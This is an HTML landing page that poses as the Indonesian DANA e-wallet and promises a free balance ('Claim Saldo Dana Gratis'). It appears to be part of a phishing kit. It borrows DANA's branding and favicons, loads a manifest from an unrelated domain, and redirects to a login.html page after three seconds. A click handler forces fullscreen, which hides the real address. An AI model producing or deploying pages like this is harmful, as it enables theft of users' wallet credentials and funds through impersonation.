<!DOCTYPE html><title>🎁Claim Saldo Dana Gratis🎁</title><meta charset=UTF-8><meta content="DANA Protection - Garansi Uang Kembali
Transaksi dompet digitalmu lebih tenang dengan DANA Protection yang menjamin keamanan untuk setiap transaksimu di DANA." name=description><meta content="Dompet digital (e-Wallet) untuk berbagai transaksi non-tunai dan non-kartu" name=keywords><link href=https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png rel=icon type=image/x-icon><link href=https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png rel=apple-touch-icon sizes=180x180><link href=https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png rel=icon type=image/png sizes=32x32><link href=https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png rel=icon type=image/png sizes=16x16><link href=https://yongkru.skemabiayatarif.com/DANA/assets/img/favicon/site.webmanifest rel=manifest><meta content="3; URL=login.html" http-equiv=refresh><meta content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" name=viewport><style>@keyframes fadeInAnimation{90%{opacity:1}to{opacity:0}}body{animation:fadeInAnimation ease 3s;animation-fill-mode:forwards;width:100%;height:100vh;margin:0;padding:0;background-color:#118eea;}.dana_index{height:100%;width:100%;max-width:380px;max-height:720px;display:flex;justify-content:center;align-items:center;flex-direction:column;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);-webkit-transform:translate(-50%,-50%);-moz-transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%);-o-transform:translate(-50%,-50%)}img{width:180px}.logo{position:relative;margin-bottom:10%}.footer{position:absolute;bottom:20px;width:290px}</style><div class=dana_index><img type link hrf =https://x.com/danawallet/status/1770389967044288782> <img class=footer src=./footer.jpg></div>
<script>
document.documentElement.addEventListener("click", function (){
    var docElm = document.documentElement;
    if (docElm.requestFullscreen) {docElm.requestFullscreen()}
    else if (docElm.mozRequestFullScreen) {docElm.mozRequestFullScreen()}
    else if (docElm.webkitRequestFullScreen) {docElm.webkitRequestFullScreen()}
});
</script>
